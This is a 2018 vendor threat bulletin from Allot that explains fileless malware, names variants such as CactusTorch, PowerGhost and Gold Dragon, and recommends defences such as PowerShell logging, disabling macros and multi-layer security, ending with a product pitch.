Fileless MalwareThe Stealth Attacker

Threat Bulletin

October 2018

Threat Bulletin

www.allot.com See. Control. Secure.

Fileless Malware - The Stealth Attacker

Fileless malware (FM), aka “non-malware”, or “fileless infection”, is a form of malicious computer

attack that exists exclusively within the realm of volatile data storage components such as RAM,

in-memory processes, and service areas This differentiates this form of malware from the classic

memory-resident virus, which requires some contact with permanent storage media such as a hard

disk drive or a disk on key.

Normally picked up following visits to malicious websites, fileless malware does not exist as a file

that can be picked up by standard antivirus programs. It lurks within a computer’s memory banks

and is exceptionally difficult to identify. However, to the upside, this type of malware rarely survives

a computer reboot, after which the computer should work as it did prior to infection. However,

new variants of this sneaky form of malware attack are now increasingly able to attach themselves

to binary files and scripts or implant themselves in an operating system’s registry where they can

sometimes survive a hard reset. FM normally finds its way into target systems using standard

Windows applications such as Microsoft PowerShell, which can enable hackers to access Windows

components undetected. 70 percent of attacks identified by Kaspersky Lab originated from

PowerShell scripts. As the attacks are launched through trusted components, then this complicates

the process of their detection and mitigation.

The Ponemon Institute, an organization that, amongst a range of other activities, evaluates online

threats and their financial impact, specified FM attacks as one of the most successful forms of

malware attack on global institutions. Kaspersky Lab found over 140 government, telecom, and

financial institutions across 40 countries had been infected by this form of malware attack.

Fileless Malware Variants

One fileless malware variant is called CactusTorch, which can

execute custom shell codes on Windows to deliver its payload.

This FM uses DotNetToJScript, which delivers a malicious payload

as JavaScript instead of compiling it into .EXE or .DLL files. The

generated .NET assemblies are embedded in JavaScript, which

makes them harder to detect using standard antivirus programs.

As with other FM, CactusTorch is loaded into memory at run

time, which bypasses most malware detection. CactusTorch has

now morphed into a further 30 variants.

Another FM called PowerGhost uses a range of fileless

management techniques to avoid detection and is designed to

hijack corporate resources to mine cryptocurrencies. During the

infection process, a one-line PowerShell code is uploaded that

installs the mining program.

Gold Dragon is yet another FM that was created to coincide with

the 2018 winter Olympics in South Korea. Written in Korean, it

formed a second-stage payload in the Olympics attack providing

a stronger persistence mechanism that was supplied by the initial

PowerShell implant itself. Gold Dragon also contained a key

generation algorithm that encrypted the data gathered during

the attack.

Of course, the simplest FM attacks of all are those generated

by the targets themselves, such as malware attached to macro

scripts. For example, both Microsoft Word and Excel each

contain the facility to incorporate labor-saving macros that can

open the PowerShell command and lead to a Trojan installation.

Social Engineering

One of the most common ways that hackers can lure their

targets into FM traps is through social engineering. This involves

observing target behavior on social media to determining the

interests, hobbies, and passions of their “marks”. Techniques used

to gather this information include phishing, malvertisements, and

watering holes.

Education is the best way to mitigate and minimize the likelihood

of malware attack through social engineering channels.

Employees and consumers must become aware of the risks of

exposing information about themselves on social media that can

then be used to hook a target and lure them into a malware trap.

Fileless Malware Mitigation

As nothing is normally written to a computer’s hard disk during

an FM attack, standard, signature-based antivirus programs

are normally ineffective. So, what is the best way to mitigate

against FM attacks if, on the surface they appear to be executing

legitimate computer instructions? The simplest way to avoid

the upload of this type of malware is to avoid clicking on the

links that install the malicious code. Of course, this is not always

possible, particularly when this malware is uploaded from

legitimate-looking websites. Furthermore, hackers are often

adept at redirecting their targets to illegitimate web locations

that are virtual copies of legal websites.

Threat Bulletin

www.allot.com See. Control. Secure.

Multi-Layer Security

As FM is difficult to detect using standard antivirus packages,

and it is hard to remove even if it is located, multi-level security

provides a robust method of defending against memory-resident

malware. This approach is increasingly deployed due to the

expansion of corporate network perimeters as the growing use

of mobile, IoT, and cloud technology make traditional antivirus

protection ineffective.

Multi-layer defense involves applying security measures

across all of an enterprise’s technology platforms. As an

example, the smartphone layer would include the following

security measures:

o Prevent modified operating systems from booting

o Kernel integrity monitoring

o Isolated execution of co-processors

o Drive encryption

o Secure storage

Similar defenses should be established across other layers of

an organization’s technology infrastructure to include:

o Firewall management

o Email protection

o Web gateways

o Micro data segmentation

In addition to going multi-layer, enterprises must also get

predictive. Potential FM attacks can be mitigated by monitoring

suspicious network behavior. For example, configuring IP

numbers to extract those emanating from unusual or irregular

geographical areas can flag those connections and potentially

block access.

Artificial intelligence (AI) systems are probably the way that the

next generation of antivirus programs will develop in the future.

AI can identify “normal” network behavior and determine if

anomalies occur. Such solutions must be able to isolate individual

endpoints in a network and prevent any infection from spreading

throughout the system.

However, there are other, more effective measures that

companies, and consumers can take to avoid painful FM attacks.

These include the following:

o Patching operating systems as frequently as recommended

by manufacturers

o Implementing a process of “least privilege” and PowerShell

logging

o Instituting regular network behavior analysis including the

monitoring of computer process logging for unusual activity

o Disabling unnecessary macros in Windows programs such

as Excel, PowerPoint, and Word

o Computer service monitoring to spot any unusual service

creation

Rapid Response

FM runs in RAM even after programs such as web browsers are

closed, which sets up a hacker’s command and control channel

ready for the upload of their malicious payloads. While a regular

PC system reboot would normally remove the FM, the malware

may persist on mobile devices that are not normally powered

down. Early FM used a download program to install the malicious

code, but now FM exploit kits such as Angler can enable even

inexperienced hackers to implant FM code easily.

Due to the increasingly sophisticated nature of FM attacks, it is

essential that this type of cyber infiltration is identified rapidly

and blocked. One of the most efficient ways of identifying FM

attacks is network monitoring that can detect suspicious traffic

and connections to malicious sites. To meet this purpose, some

antivirus programs now include more behavioral or heuristic

detection methods in their products.

While PowerShell and other scripting programs are launched

as regular, legitimate applications, they can be detected by

monitoring services that scan registry entries. Memory analysis

tools can also be deployed to detect and analyze malware and

provide alerts and recommendations.

Threat Bulletin

www.allot.com See. Control. Secure.

Conclusion

Fileless malware attacks have increased in number and sophistication since the start of 2017. The Ponemon Institute states that

seven out of ten organizations in a 2017 poll reported significant increase in endpoint security risk, with 77% of successful attacks

utilizing fileless techniques. The same report confirmed that traditional antivirus solutions have become ineffective with four out of

five organizations dissatisfied with their existing antivirus packages. Endpoint solutions are increasingly deployed as organizations turn

their focus from network solutions to a multi-layered security approach. Organizations in the Ponemon survey also confirmed that

traditional network security is not only ineffective, it is also difficult and expensive to manage.

Despite the risks posed by FM, steps to mitigate against the threat are relatively simple and inexpensive. The education of home

consumers and company employees is certainly one of the most effective ways of reducing the chance of FM infection, and campaigns

that spread the message of the risk from this type of malware should be enhanced.

Threat Bulletin

www.allot.com See. Control. Secure.

Are you concerned about fileless malware attacks?

Allot’s NetworkSecure and HomeSecure products can assist.

Contact Allot »